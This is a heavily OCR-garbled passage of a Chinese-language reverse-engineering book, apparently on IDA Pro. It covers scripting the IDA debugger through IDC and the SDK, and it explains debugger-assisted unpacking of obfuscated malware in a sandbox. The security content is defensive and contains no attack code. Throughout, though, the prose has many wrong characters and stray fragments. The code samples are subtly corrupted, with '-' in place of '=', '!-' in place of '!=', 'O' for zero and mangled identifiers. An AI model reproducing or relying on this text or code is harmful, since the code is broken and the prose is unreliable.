"f 
static my breakpoint condition() { 
return AskYN(1, "my breakpoint condition activated, break now?") -- 1; 


j 
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/* 
* This function is required to register my breakpoint condition 
* as a breakpoint conditional expression 
"f 
static main() { 
auto addr; 
addr - ScreenEA(); 
AddBpt (addr); 
SetBptCnd(addr, "my breakpoint condition()"); 
j 


my breakpoint condition 的 复杂 程度 完全 由 你 目 己 决定 。 在 这 个 例子 中 , 每 次 过 到 一 个 新 的 
岂 点 ， 都 会 显示 一 个 对 话 框 ,询问 用 户 是 想 要 继续 执行 进程 ， 还 是 在 当前 位 置 暂 停 。 调 试 器 使 用 
my breakpoint condition 返回 的 值 决定 是 实践 断 点 ， 还 是 忽略 断 点 。 

从 SDK 及 通过 使 用 脚本 均 能 够 以 编程 方式 控制 调试 项 。 在 SDK A, IDA 利用 事件 驱动 模型 
并 在 发 生 特 定 的 调试 需 事件 时 向 插件 提供 回调 通知 。 遗 憾 的 是 ,IDA 的 脚本 功能 并 不 便于 在 脚本 
中 使 用 事件 驱动 范 型 。 因 此 ，Hex-Rays 引入 了 许多 用 于 从 脚本 中 同步 控制 调试 器 的 脚本 函数 。 
使 用 脚本 驱动 调试 需 的 基本 方法 是 开始 一 个 调试 圳 操作 , 然后 等 待 对 应 的 调试 圳 事件 代码 。 记 住 ， 
调用 一 个 同步 调试 带 函 数 (这 是 你 在 脚本 中 能 够 执行 的 所 有 操作 ) D. IDA 的 所 有 其 他 操作 将 被 
阻止 ， 直 到 这 个 调用 完成 。 下 面 详细 说 明了 几 个 调试 扩展 。 

D long GetDebuggerEvent(long wait evt, long timeout)。 在 指定 的 秒 数 内 〈-1 表示 永远 等 

f$) 等 竺 一 个 调试 部 事件 (由 wait evt 指定 ) 发 生 。 返 回 一 个 事件 类 型 ， 指 出 收 到 的 事 
件 的 类 型 ,使 用 一 个 或 几 个 WFNE_XXX (WEFNE 表 示 WaitForNext Event ) 标 志 指 定 wait evt. 
请 参阅 IDA 帮助 文件 了 解 可 能 的 返回 值 。 

口 bool RunTo(long addr)。 运 行进 程 ， 直 到 到 达 指 定 的 位 置 或 遇 到 一 个 断 点 。 

O bool StepInto()。 按 指令 逐步 运行 进程 ， 步 和 任何 男 数 调用 。 

O bool Step0ver()。 按 指令 逐步 运行 进程 ， 路 过 任何 晒 数 调用 。 遇 到 上 断 点 时 该 调用 可 能 提 
前 终止 。 

O bool StepUntilRet()。 运 行进 程 ， 直 到 当前 晒 数 调用 返回 或 遇 到 一 个 断 点 。 

O bool EnableTracing(long trace level, long enable)。 启 用 (或 禁用 ) 跟踪 事件 的 生成 。 
trace level 参数 应 设置 为 在 idc.idc 中 定义 的 一 个 TRACE XXX 常量 。 

口 long GetEventXXX()。 有 许多 吗 数 可 用 于 获取 与 当前 调试 事件 有 关 的 信息 。 其 中 一 些 函 数 
仅 对 特定 的 事件 类 型 有 效 。 你 应 该 测试 GetDebuggerEvent 的 返回 值 ， 以 确保 某 个 
GetEventXXX PR n] Hj; 

TED eR HUS AS, cht E OEB rg RGR IDE, MS] GetDebugger- 
Event。 如 果 不 这 样 做 ， 随 后 单 步 执 行 或 运行 进程 的 尝试 将 会 失败 。 例 如 ， 下 面 的 代码 只 会 单 步 
执行 调试 器 一 次 , 因为 它 没有 在 两 次 调用 Step0ver 之 间 调 用 GetDebuggerEvent, 以 清除 上 一 个 事 
件 类 型 。 
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StepOver(); 
StepOver(); //this and all subsequent calls will fail 
StepOver(); 
StepOver(); 








正确 的 执行 方法 是 在 每 次 调用 StepOver 之 后 调用 一 次 GetDebuggerEvent, ， 如 下 所 示 : 


StepOver(); 
GetDebuggerEvent(WFNE SUSP, -1); 
StepOver(); 
GetDebuggerEvent(WFNE SUSP, -1); 
StepOver(); 
GetDebuggerEvent(WFNE SUSP, -1); 
StepOver(); 
GetDebuggerEvent(WFNE SUSP, -1); 


调用 GetDebuggerEvent 后 ， 即 使 你 选择 忽略 GetDebuggerEvent 的 返回 值 ， 执 行 仍 将 继续 。 
事件 类 型 WFNE_SUSP 表示 我 们 要 等 待 一 个 使 被 调试 的 进程 挂 起 的 事件 ， 如 一 个 异常 或 断 点 。 你 可 
能 已 经 注意 到 ， 并 没有 函数 可 以 恢复 执行 一 个 被 挂 起 的 进程 "。 但 是 ， 通 过 在 调用 GetDebugger- 
Event 时 使 用 WFNE_CONT 标志 ， 我 们 可 以 达到 相同 的 目的 ， 如 下 所 示 : 











GetDebuggerEvent(WFNE SUSP | WFNE CONT, -1); 


这 个 特殊 的 调用 通过 继续 由 当前 指令 位 置 执 行进 程 , 等 待 初步 恢复 执行 后 的 下 一 个 可 用 的 挂 
起 事件 。 

其 他 函数 可 用 于 目 动 局 动 调试 希 和 依附 正在 运行 的 进程 。 请 参阅 IDA 帮助 文件 ， 了 解 这 些 
胃 数 的 更 多 信息 。 

下 面 是 一 个 简单 的 调试 带 脚 本 , 通过 它 可 以 收集 与 被 提取 的 指令 的 地 址 有 关 的 统计 信息 ( 假 
如 调试 带 已 经 局 用 )， 如 下 所 示 : 











static main() { 
auto ca, code, addr, count, idx; 
© ca = GetArrayId("stats"); 
if (ca != -1) { 
DeleteArray(ca); 


ca = CreateArray(" stats"); 
EnableTracing(TRACE STEP, 1); 
for (code = GetDebuggerEvent(WFNE ANY | WFNE CONT, -1); code > O; 
code = GetDebuggerEvent(WFNE ANY | WFNE CONT, -1)) { 
addr - GetEventEa(); 
count = GetArrayElement(AR LONG, ca, addr) + 1; 
SetArrayLong(ca, addr, count); 


ooo OG 


j 


D 实际 上 有 一 个 定义 为 GetDebuggerEvent(WFNE CONT|WFNE NOWAIT，0) 的 宏 Resume Process, 
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EnableTracing(TRACE STEP, 0); 
o for (idx = GetFirstIndex(AR LONG, ca); 
idx !- BADADDR; 
idx = GetNextIndex(AR LONG, ca, idx)) { 
count = GetArrayElement(AR LONG, ca, idx); 
Message("Xx: %d\n", idx, count); 


} 
© DeleteArray(ca); 





这 个 脚本 首先 测试 一 个 名 为 stats 的 全 局 数组 是 否 存 在 ( @ )。 如 采 存 在 ， 则 删除 该 数组 ， 
青 重 建 一 个 ， 以 便 我 们 可 以 使 用 一 个 空 数组 。 接 下 来 ， 启 用 单 步 跟 踊 ( @ )， 然 后 进入 一 个 循环 
( 6 ) 开始 单 步 执 行进 程 。 每 次 生成 一 个 调试 事件 ,将 获取 相关 事件 的 地 址 ( @ )， 相 关 地 址 的 当 
前 总 数 从 全 局 数组 中 获取 ， 并 不 断 递增 ( @ )， 该 数组 将 根据 新 的 总 数 更 新 ( @ ), 注意 ， 这 里 的 
指令 指针 用 做 稀 瑰 全 局 数组 的 索引 ， 使 我 们 人 免 于 查找 其 他 数据 结构 的 地 址 ， 从 而 市 省 大 量 时 间 。 
整个 过 程 结束 后 ， 再 使 用 第 二 个 循环 〈@ ) 获取 并 打印 所 有 拥有 有 效 值 的 数组 位 置 的 值 。 在 这 个 
例子 中 , 拥有 有 效 值 的 数组 索引 代表 被 提取 指令 的 地 址 。 最 后 ,这 个 脚本 删除 用 于 收集 统计 信息 
的 全 局 数组 ( 9 )。 这 个 脚本 的 示例 输出 如 下 所 示 : 
401028: 
40102b: 
40102e : 
401031: 
401034: 
401036: 
T A 
稍 作 修改 后 ， 前 面 的 例子 可 用 于 收集 有 关 指 令 类 型 的 统计 信息 ， 即 在 一 个 进程 执行 过 程 中 ， 
有 哪些 类 型 的 指令 被 执行 。 下 面 的 例子 说 明 如 何 对 第 一 个 循环 进行 必要 的 修改 , 以 收集 指令 类 型 
数据 〈 而 非 地 址 数据 ): 
for (code = GetDebuggerEvent(WFNE ANY | WFNE CONT, -1); code > 0; 
code = GetDebuggerEvent(WFNE ANY | WFNE CONT, -1)) { 
addr = GetEventEa(); 
mnem - GetMnem(addr); 
count = GetHashLong(ht, mnem) + 1; 


SetHashLong(ht, mnem, count); 
} 


我 们 并 没有 对 各 个 操作 码 分 类 ， 而 是 选择 按 助 记 符 将 指令 分 组 ( @ ) 由 于 助 记 符 是 字符 串 ， 
所 以 我 们 利用 全 局 数组 的 散 列 表 特 性 获取 与 一 个 给 定 助 记 符 有 关 的 当前 总 数 〈@@ )， 并 将 更 新 后 
的 总 数 (el 保存 到 对 应 的 散 列 表 条 目 中 。 这 个 修改 后 的 脚本 的 样本 输出 如 下 所 示 : 














HB A ÄM kä kä 








E e 





add : 18 
and : 2 
call: 46 


cmp: 16 
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dec: 1 
imul: 2 
jge: 2 
jmp: 5 
jnz: 7 
js: Í 
RES 5 
lea: 4 
mov: 56 
pop: 25 
push: 59 
retn: 19 
sar: 2 
setnz: 3 
test: 3 
XOI: 7 


在 第 25 章 中 ， 我 们 将 讨论 如 何 利用 调试 器 的 迭代 功能 对 二 进 制 文件 进行 去 模糊 处 理 。 
24.4.2 ”使 用 IDA 插 件 实 现 调试 器 操作 自动 化 


在 第 16 章 中 ,我 们 了 解 到 ,IDA 的 SDK 提供 了 非常 强大 的 功能 ， 用 于 开发 各 种 复杂 的 编译 
扩展 ， 这 些 扩展 可 以 与 IDA 集成 ， 并 能 够 访问 全 部 IDAAPI。IDAAPI 提 供 了 IDC 的 所 有 功能 ， 
调试 扩展 也 不 例外 。API 的 调试 器 扩展 在 <SDKDIR>/dbg.hpp 文件 中 声明 ， 其 中 包含 与 我 们 迄今 
为 止 所 讨论 的 IDC 函数 对 应 的 C++ 函数 ， 以 及 全 面 的 异步 调试 器 接口 功能 。 

为 了 实现 异步 交互 ,插件 通过 “ 钓 住 ”HT_DBG 通知 类 型 ( 参见 loader.hpp 文件 ) 访问 调试 器 
通知 。 调 试 需 通 知 在 dbg.hpp 文件 中 的 dbg notification t 枚 举 中 声明 。 

在 调试 器 API 中 , 用 于 与 调试 器 交互 的 命令 通常 成 对 定义 ， 一 个 函数 用 于 同步 交互 ， 另 一 个 
中 数 则 用 于 异步 交互 。 一 般 而 言 ， 一 个 函数 的 同步 形式 命名 为 COMMAND() ， 而 对 应 的 异步 形式 则 
命名 为 request COMMAND()。request XXX 函数 用 于 对 调试 妖 操 作 排 队 ， 以 便于 随后 的 人 处理。 排列 
好 异步 请 求 后 ， 必 须 调用 run requests 函数 ， 开 始 处 理 请 求 队列 。 在 处 理 请 求 时 ， 调 试 器 通知 
将 被 传递 给 你 通过 hook to notification point 注册 的 任何 回调 函数 。 

使 用 异步 通知 ， 我 们 可 以 为 前 一 节 中 用 于 统计 地 址 总 数 的 脚本 开发 一 个 异步 版 本 。 首 先 ， 我们 需 
要 配置 如 何 “ 钩 住 ” 和 松 开 调试 需 通 知 。 我 们 使 用 插件 的 in 让 和 term 方法 完成 这 个 任务 ， 如 下 所 示 : 


//A netnode to gather stats into 
€) netnode stats("$ stats", O, true); 

















int idaapi init(void) { 
hook to notification point(HT DBG, dbg hook, NULL); 
return PLUGIN KEEP; 

} 


void idaapi term(void) { 
unhook from notification point(HT DBG, dbg hook, NULL); 
} 
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注意 ,我们 还 声明 了 一 个 全 局 网 络 市 点 ( @ )， 用 来 收集 统计 信息 。 接 下 来 需要 考虑 ， 使 用 
分 配 的 热 键 激活 插件 后 ， 我 们 希望 它 执行 什么 任务 。 示 例 插 件 的 run 函数 如 下 所 示 : 


void idaapi run(int arg) { 
stats.altdel();  //clear any existing stats 
d request enable step trace(); 
e request step until ret(); 
e run requests(); 


j 


在 这 个 例子 中 ， 由 于 我 们 使 用 的 是 异步 技巧 ， 首 先 我 们 必须 提供 一 个 请 求 ， 启 动 单 步 跟 踊 
( 9), 然后 提交 一 个 请 求 恢复 被 调试 的 进程 ,为 了 简化 , 我 们 仪 收集 与 当前 函数 有 关 的 统计 信息 ， 
因此 我 们 将 提出 一 个 请 求 ， 要 求 运行 进程 ， 直 到 当前 函数 返回 ( @ )。 对 请 求 正确 排序 后 ， 我 们 
调用 run requests 处 理 当 前 请 求 的 队列 ( @ )， 开 始 运行 这 个 插件 。 

接 下 来 创建 HT DBG 回调 函数 ， 人 处 理 我 们 希望 收 到 的 通知 。 下 面 是 一 个 仅 处 理 两 条 消息 的 简 
PA [n] 8] PKŠ: 














int idaapi dbg hook(void *user data, int notification code, va list va) { 
switch (notification code) { 
case dbg trace: //notification arguments are detailed in dbg.hpp 
va arg(va, thid t); 
ea t ea - va arg(va, ea t); 
//increment the count for this address 
stats.altset(ea, stats.altval(ea) + 1); 
return 0; 
case dbg step until ret: 
//print results 
for (nodeidx t i = stats.altist(); i !- BADNODE; i = stats.altnxt(i)) { 
msg(" x: %d\n", i, stats.altval(i)); 


o © © © © 


//delete the netnode and stop tracing 
stats.kill(); 

request disable step trace(); 

run requests(); 

break; 


GK: 


j 
} 


对 于 执行 的 每 一 条 指令 ,我 们 将 收 到 dbg trace 通知 CO), 直到 我 们 关闭 跟踪 。 收 到 一 个 中 24 — 
踪 通 知 时 ， 从 参数 列表 (0) 中 获取 跟踪 点 的 地 址 ， 用 于 更 新 相应 的 网 络 节点 数组 索引 ( @ )， 
进程 到 达 return 语句 ， 离 开 我 们 最 初 局 动 的 图 数 时 将 发 送 dbg step_until_ret 通知 (@ )。 这 个 
通知 是 一 个 信号 ， 表 示 我 们 应 停止 跟踪 ， 并 打印 我 们 收集 到 的 任何 统计 信息 。 接 下 来 ,我 们 使 用 
一 个 循环 ( @ ) m stats 网 络 市 点 的 所 有 有 效 索 引 值 ， 然后 销 磺 该 网 络 节 点 ( 9), 并 请 求 禁用 
单 步 跟踪 ( @ )， 由 于 这 个 例子 使 用 的 是 异步 命令 ， 禁 用 跟踪 的 请 求 被 添加 到 队列 中 ， 这 意味 着 
我 们 必须 调用 run. requests ( 9 ) 来 处 理 队 列 。 关 于 与 调试 各 的 同步 交互 和 异步 交互 ， 有 一 个 重 
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要 的 警告 : 在 处 理 异 步 通知 消息 时 ， 你 绝 不 能 调用 一 个 函数 的 同步 版 本 。 

使 用 SDK 与 调试 硕 进 行 同 步 交 互 的 方式 ， 与 为 调试 器 操 作 编 写 脚 本 的 做 法 非常 类 似 。 和 我 
们 在 前 几 章 中 讨论 的 许多 SDK 函数 一 样 ， 与 调试 器 有 关 的 子 数 名 称 通常 与 相关 的 脚本 函数 名 称 
并 不 匹配 , 因此 , 你 可 能 需要 花 一 些 时 间 搜 索 dbg.hpp 文件 , 查找 你 需要 的 函数 。 脚本 函数 与 SDK 
在 名 称 上 的 最 大 差异 表现 在 SDK 的 GetDebuggerEvent KA E, Æ SDK 中 ， 它 叫做 wait Tor 
next event, MIRRA SDK 的 另 一 个 主要 差异 在 于 SDK 并 不 为 你 目 动 声明 与 CPU 寄存 硕 对 应 
的 变量 。 为 了 从 SDK 中 访问 CPU 寄存 器 的 值 ， 你 必须 分 别 使 用 get reg val 和 set reg val K 
数 读 取 和 写 人 寄存 髓 。 




















24.5 ”小 结 


IDA 在 调试 划 市 场 中 并 没有 占有 最 大 的 市 场 份额 ,但 它 的 调试 帮 非 常 强 大 ， 能 够 与 IDA 的 
反 汇 编 货 无 颖 集成 。 和 任何 调试 甫 一 样 ， 你 需要 一 段 时 间 来 玖 悉 这 个 调试 带 的 用 户 界 面 , 它 提 供 
了 用 户 在 一 个 基本 的 调试 可 中 所 需要 的 全 部 重要 功能 。 它 的 优点 包括 : 脚本 和 插件 功能 、 与 IDA 
的 反 汇 编 窒 口 类 似 的 用 户 界 面 以 及 强大 的 分 析 功 能 。 反 汇编 万/ 调试 厅 的 完美 结合 ， 将 为 我 们 提 
供 一 个 可 徘 的 工具 ， 用 于 执行 静态 分 析 、 动 态 分 析 ， 或 者 同时 执行 这 两 种 分 析 。 




















反 汇 编 咒 /调试 需 集 克 
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具 单 独 使 用 以 及 结合 使 用 的 功能 和 限制 ， 你 同样 可 以 实现 相同 的 目的 。 

本 章 将 讨论 一 些 重要 的 问题 ， 说 明 IDA 的 静态 功能 如 何 与 它 的 动态 功能 交互 。 为 了 给 这 方 
面 的 讨论 提供 启示 ， 我 们 将 研究 可 被 IDA 调试 器 采用 、 用 于 在 恶意 软件 分 析 时 破坏 某 些 反 调试 
( 及 反 “ 反 汇编 ”) 技巧 的 方法 。 在 这 方面 , 需要 记 住 的 是 ,我 们 分 析 恶 意 软件 的 目的 通常 并 不 是 
运行 恶意 软件 ， 而 是 获得 一 个 质量 足够 好 的 反 汇编 代码 清单 ， 以 供 静态 分 析 工具 使 用 。 如 第 21 
章 所 述 ， 有 许多 技巧 专门 用 于 阻止 反 汇 编 正 常 运行 ， 而 调试 器 只 是 破坏 这 些 技巧 的 一 种 手段 。 
通过 在 调试 器 的 控制 下 运行 模糊 程序 ， 我 们 将 设法 获得 该 程序 的 去 模糊 版 本 ,然后 使 用 反 汇 编 
器 进行 分 析 。 


25.1 背景 知识 


首先 , 我 们 有 必要 了 解 一 些 有 关 调 试 侣 辅助 去 模糊 的 至 景 知识 。 众所周知 , 在 发 挥 作 用 之 前 ， 
一 个 模糊 程序 必须 先 对 目 身 去 醒 炎 。 下 面 的 步 又 提供 一 个 简单 的 基本 指南 ,说 明 如 何 对 二 进 制 文 
件 进行 动态 去 模糊 。 

(1) 使 用 调试 融 打 开 一 个 模糊 程序 。 

(2) 在 去 模糊 例 程 的 结束 部 分 搜索 并 设置 一 个 断 点 。 

(3) 从 调试 般 中 局 动 程序 ， 等 待 断 点 被 触发 。 

(4) 利用 调试 希 的 内 存 转 储 功能 捕获 进程 的 当前 状态 ， 并 将 其 保存 到 一 个 文件 中 。 

(5) 在 进程 实施 任何 恶意 行为 之 前 终止 进程 。 

(6) 对 捕获 到 的 进程 映像 执行 静态 分 析 。 

大 多 数 现代 调试 器 都 足以 执行 上 述 任 务 。OllyDbg" 是 Windows 平台 上 的 一 款 非常 流行 的 调 
试 带 ,第 用 于 完成 这 些 任务 。 步 骂 (2) 并 不 总 是 像 看 起 来 那样 人 简单。 在 这 个 步 又 中 , 你 可 能 需要 使 
用 许多 工具 ， 包 括 长 时 间 使 用 IDA 之 类 的 反 汇 编 融 ， 或 者 进行 许多 单 步 操作 ， 才 能 正确 识别 去 
模糊 算法 。 许 多 时 候 ， 去 模糊 过 程 以 一 个 行为 (而 不 是 一 条 特定 指令 ) 作为 结束 标记 。 这 样 的 行 





















































CD 参见 http://www.ollydbg.de/。 
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为 可 能 是 指令 指针 值 的 明显 变化 ， 用 以 标明 一 个 指向 远离 去 模糊 代码 位 置 的 跳 转 。 例 如 ， 在 UPX 
打包 的 二 进 制 文件 中 , 你 所 需要 做 的 是 观察 指令 指针 保存 的 值 。 如 果 这 个 值 小 于 程序 的 入口 点 地 
址 , 则 说 明 去 模糊 已 经 完成 ,程序 已 经 跳 转 到 新 的 、 去 模糊 后 的 代码 部 分 。 通 第 ， 这 个 过 程 叫 做 
初始 入 口 点 (OEP ) 识别 ， 这 里 的 OEP 是 程序 在 经 过 模糊 处 理 之 前 开始 执行 的 地 址 。 

使 事情 更 复杂 的 是 , 一 些 现 代 模 糊 癌 能 够 将 输入 的 可 执行 文件 转换 为 等 效 的 字 市 码 程序 , 然 
后 在 由 该 模糊 器 "生成 的 自 定义 虚拟 机 上 运行 。 在 分 析 这 类 受 虚 拟 化 模糊 器 保护 的 可 执行 文件 时 ， 
你 不 能 像 执 行 传统 的 分 析 那 样 期 每 发 现 原始 二 进 制 文件 或 定位 原始 入 口 点 。 这 是 因为 原始 的 x86 
(或 其 他 处 理 硕 ) 指令 并 未 磐 和 到 经 过 模糊 处 理 的 二 进 制 文件 中 ， 因 此 你 根本 找 不 到 这 类 指令 。 

如 采 你 不 够 小 心 , 步 又 (3) 可 能 会 市 来 危险 。 任何 时 候 , 在 允许 一 个 晋 意 软件 不 党 阻碍 地 运行 
之 前 , 你 都 应 该 三 思 , 保证 你 已 经 正确 设置 了 断 点 或 断 点 条 件 。 如 采 恶 意 程序 设法 避 开 你 的 断 点 ， 
它 可 能 会 悄悄 地 执行 恶意 代码 。 因 此 ， 如 采 你 要 在 调试 可 的 控制 下 对 恶意 软件 去 模糊 ， 你 应 该 始 
终 在 一 个 沙 盒 环 境 中 执行 这 项 操作 ， 这 样 ， 即 使 出 现 错误 ， 你 也 不 用 担心 因此 导致 的 不 良 后 果 。 

步 台 (4) 可 能 需要 你 付出 一 定 的 努力 ， 这 是 因为 虽然 调试 草 通 常 文 持 内 存 转 储 ,但 它 并 不 文 持 整 
个 进程 的 内 存 映像 转 储 。Gigapede 开发 的 OllyDump“ 插 件 为 OllyDbg 提供 了 进程 转 储 功能 。 需 要 注 
意 的 是 ， 从 内 存 中 转 储 的 映像 包含 一 个 正在 运行 的 进程 的 内 容 ， 并 不 一 定 能 够 反映 位 于 磁盘 文件 中 
的 静态 二 进 制 文件 的 初始 状态 。 但 是 ， 在 恶意 软件 分 析 中 ,我 们 的 目的 并 不 是 创建 一 个 经 过 去 模糊 
处 理 的 可 执行 文件 , 而 是 创建 一 个 结构 正确 的 映像 文件 , 以 便 将 它 加 载 到 反 汇 编 带 中 进行 深入 分 析 。 

由 模糊 进程 重建 一 个 二 进 制 映像 ,最 困难 的 是 如 何 恢复 该 程序 的 导入 函数 表 。 在 模糊 过 程 中 ， 
程序 的 导 和 人 表 也 往往 被 模糊 处 理 。 因 此 , 去 模糊 过 程 还 必须 考虑 将 新 近 经 过 去 模糊 处 理 的 进程 链 
接 到 它 正 常 运行 所 需 的 所 有 共 圣 库 和 水 数 。 通常, 这 个 进程 的 唯一 线索 是 该 进程 内 存 映 像 中 的 一 
个 导入 函数 地 址 表 。 一 般 来 说 ,在 将 一 个 经 过 去 模糊 处 理 的 进程 映像 转 储 到 一 个 文件 中 时 ,你 需 
要 采取 步骤 , 设法 在 转 储 的 进程 映像 中 重建 一 个 有 效 的 导入 表 。 为 此 , 你 需要 修改 转 储 映像 的 尖 
部 , 使 它 指 癌 一 个 新 的 时 入 表 结 构 , 这 个 导入 表 必 须 正 确 反 映 经 过 去 模糊 处 理 的 原始 程序 的 共 至 
库 依 赖 关 系 。MackT 开发 的 ImpREC"? ( Import REConstruction ) 实用 工具 是 一 款 广 受 欢迎 的 工具 ， 
可 用 于 自动 完成 这 个 任务 。 和 进程 转 储 一 样 , 请 记 住 ,提取 独立 的 可 执行 文件 可 能 并 不 是 你 分 析 
恶意 程序 的 主要 目的 。 相 比 于 重建 有 效 的 头 部 和 工作 导入 表 , 了 解 哪些 孔 数 已 被 解析 以 及 这 些 函 
数 的 地 址 的 存储 位 置 要 更 为 重要 。 



















































































25.2 IDA 数据 库 与 IDA 调试 器 


站 和 完 ,我 们 需要 了 解 ， 当 你 启动 (和 终止 ) 一 个 调试 融会 话 时 ， 调 试 角 如 何 处 理 数 据 库 。 调 
试 带 需要 使 用 一 个 进程 映像 。 通常 , 调试 胡 通 过 依附 一 个 现 有 的 进程 ， 或 由 可 执行 文件 创建 新 的 





D DC 2 RES ZS VMProtect 的 讨论 , 参阅 Rolf Rooles 的 “Unpacking Virtualization Obfuscators" , 地 址 为 : http://www. 
usenix.org/event/wootOO/tech/full papers/rolles.pdf。 

(2) 参见 http://www.woodmann.com/collaborative/tools/index.php/OllyDump。 

(3) 参见 http:/www.woodmann.comy/collaborative/tools/index.php/ImpREC。 
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进程 ， 从 而 获得 进程 映像 。IDA 数据 库 并 不 包含 有 效 的 进程 映像 ， 多 数 情 况 下 ,你 也 不 可 能 由 一 
个 数据 库 重建 一 个 有 效 的 进程 映像 ( 如 果 你 可 以 ,使 用 File » Produce File Create EXE File 命令 
即 可 )。 当 你 在 IDA 中 局 动 一 个 调试 大 会 话 时 ， 反 汇编 硕 会 告知 调试 硕 初 始 输入 文件 的 名 称 ， 调 
试 需 再 使 用 这 个 文件 创建 并 依附 于 一 个 新 的 进程 。 反 汇编 需 提 供给 调试 右 的 信息 反 汇 编 句 格式 
化 、 符 号 名 、 数 据 格式 化 以 及 任何 你 输入 到 数据 库 中 的 注释 。 重 要 的 是 ,你 对 数据 库 进行 的 任何 
修补 ( 字 市 内 容 的 变化 ) 都 不 会 在 被 调试 的 进程 中 反映 出 来 。 换 言 之， 即使 你 对 数据 库 进行 了 修 
补 ， 也 不 能 在 启动 调试 器 时 观察 到 这 些 修补 产生 的 效果 。 

反之 也 是 如 此 。 当 你 调试 完 一 个 进程 并 返回 反 汇编 模式 时 ,默认 情况 下 ,数据 库 反 映 出 来 的 
仅 有 的 变化 全 都 属于 表面 上 的 变化 ( 如 重 命 名 变量 或 函数 )。 任何 内 存 变 化 ( 如 自修 改 代码 ), db 
不 会 在 数据 库 中 反映 出 来 , 使 你 能 够 对 其 分 析 。 如 果 你 希望 将 所 有 新 近 经 过 去 模糊 处 理 的 代码 从 
调试 器 移 回 到 反 汇 编 数 据 库 中 , 可 以 使 用 IDA 的 Debugger > Take Memory Snapshot ( 拍摄 内 存 快 
照 ) 命令 来 实现 。 它 生成 的 确认 对 话 框 如 图 25-1 所 示 。 











x 
IDA is going to copy data from the debugged process to the database. 
What segments you want to save? 


FEN ETENIM 


[ Don't display this message again 





图 25-1. 内 存 快照 确认 对 话 框 


默认 选项 是 将 加 载 硕 段 由 正在 运行 的 进程 复制 到 数据 库 中 。 加 载 器 段 loader segment ) 是 指 
那些 由 IDA. 的 一 个 加 载 需 模块 加 载 到 数据 库 中 的 段 。 在 模糊 程序 中 ， 一 个 或 儿 个 这 样 的 段 可 能 
包含 一 些 已 经 被 模糊 处 理 , 因而 几乎 不 可 能 在 反 汇 编 带 中 分 析 
的 数据 。 这 些 段 恰 恰 是 你 想 要 从 正在 运行 的 进程 映像 中 复制 的 
段 ， 用 来 利用 在 调试 器 控制 下 该 进程 执行 的 去 模糊 工作 。 SE 

单 击 All segments 按钮 ， 则 调试 右 创 建 的 所 有 上 段 都 被 复制 startaddress [oxixoo F] 

到 数据 库 中 。 这些 段 包括 为 支持 该 进程 而 加 载 的 所 有 共 至 库 的 End address [oxisomo l 
内 容 ， 以 及 其 他 进程 相关 的 段 ， 如 栈 内 容 和 堆 内 容 。 SUE 

TIE S Cd Ae HY MKBN 20 THOSIGDS PE S] BU ERE, Desen Combination | ( pubic ) 

JEDE EE RE PE n CROP VOZ Ditt E, 因为 该 文件 并 不 C 32bitsegment | _ Aignment | ( byte ) 
是 由 IDA 的 加 载 器 加 载 的 。 这 时 , 你 可 以 选择 将 所 有 可 用 的 段 “下 
捕获 到 一 个 新 的 数据 库 中 。 此 外 ， 你 也 可 以 选择 编辑 段 属性 ， 
并 且 将 一 个 或 几 个 段 指定 为 加 载 硕 段 。 要 编辑 段 属 性 ,你 首先 
需要 打开 Segments 窗口 (View » Open Subviews > Segments )。 
任何 标记 为 加 载 需 段 的 段 将 包含 Program Segmentation 窗口 中 
LL 列 中 的 工 右 击 一 个 感 兴趣 的 段 ， 并 在 出 现 的 菜单 中 选择 Edit 
Seement， 这 时 生成 的 段 属性 对 话 框 如 图 25-2 所 示 。 
















Change segment attributes 














K| 25-2 ĦA Loader segment 复 选 
框 的 段 编 辑 对 话 框 
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选择 Loader segment 复 选 框 会 将 一 个 段 标 记 为 加 载 右 段 ， 并 将 它 和 所 有 其 他 加 载 带 段 一 起 复 
制 到 数据 库 中 。 

当 你 已 从 打开 的 数据 库 创 建 了 进程 ， 并 希望 在 拍摄 内 存 快照 之 前 添加 其 他 加 载 需 段 时 ,“ 段 
属性 ”对 话 框 也 非常 有 用 。 例 如， 如 果 模 糊 进 程 将 原始 代码 提取 到 位 于 堆 中 的 内 存 块 (或 内 存 映 
WAR) 中 ， 你 会 布 望 在 拍摄 内 存 快照 前 将 该 内 存 块 标 记 为 加 载 可 段 ， 否 则 ， 去 模糊 代码 将 不 会 
被 复制 到 数据 库 中 。 


25.3 ”调试 模糊 代码 


我 们 已 经 多 次 提 到 : 在 调试 融 中 加 载 一 个 模糊 程序 ， 使 它 继续 运行 ， 直 到 去 模糊 过 程 完成 ， 
然后 提 摄 该 程序 经 过 去 模糊 处 理 后 的 内 存 快照 , 这 似乎 是 一 个 不 错 的 宁 略 ,可 以 帮助 我 们 获得 程 
序 的 去 模糊 版 本 。 但 是 ， 与 调试 相 比 ， 以 受 控 执 行 ( controlled execution ) 的 方式 实施 这 个 策略 
可 能 要 更 好 一 些 , 因为 这 时 我 们 只 需要 观察 代码 的 运行 状态 , 然后 在 适当 的 时 候 拍摄 一 张 内 存 快 
照 。 调 试 带 这 种 工具 正好 可 以 帮助 我 们 完成 这 个 任务 ， 至 少 它 是 我 们 正在 寻找 的 工具 。 在 第 21 
Sch, 我们 了 解 到 一 系列 反 “ 反 沪 编 ”和 反 调 斌 技巧, 模糊 带 正 是 利用 这 些 技巧 阻止 我 们 清楚 了 
解 程序 的 行为 。 现 在 ， 我 们 来 看 IDA 调试 希 如 何 帮 助 我 们 避 开 其 中 一 些 技巧 。 

在 本 章 中 , 假定 我 们 所 处 理 的 模糊 程序 全 都 对 二 进 制 文件 的 相关 部 分 进行 了 某 种 形式 的 加 密 
或 压缩 。 了 解 模糊 代码 的 用 途 的 困难 程度 ,完全 取决 于 模糊 过 程 所 使 用 的 反 分 析 技 巧 ， 以 及 为 避 
开 这 些 技 马 而 采取 的 措施 的 复杂 程度 。 但 是 ,在 开始 讨论 之 前 , 我 们 首先 说 明 在 调试 环境 中 分 析 
恶意 软件 逢 要 巡 循 的 一 些 规则 。 

(1) 保护 网 络 和 主机 环境 。 娘 终 在 一 个 沙 盒 环境 中 进行 分 析 。 

(D) 在 初始 分 析 时 ， 尽 可 能 使 用 单 步 分 析 。 这 样 做 可 能 有 些 烦 琐 ， 但 这 是 防止 程序 脱离 你 的 
控制 的 最 佳 方法 。 

(3) 在 执行 允许 执行 多 条 指令 的 调试 带 命令 之 前 ， 请 三 思 而 行 。 如 时 控 制 不 当 ， 你 调试 的 程 
序 可 能 会 执行 代码 的 恶意 部 分 。 

(4) 如 有 可 能 ， 使 用 人 硬件 断 点 。 你 很 难 在 模糊 代码 中 设置 软件 断 点 ， 因 为 去 模糊 算法 可 能 会 
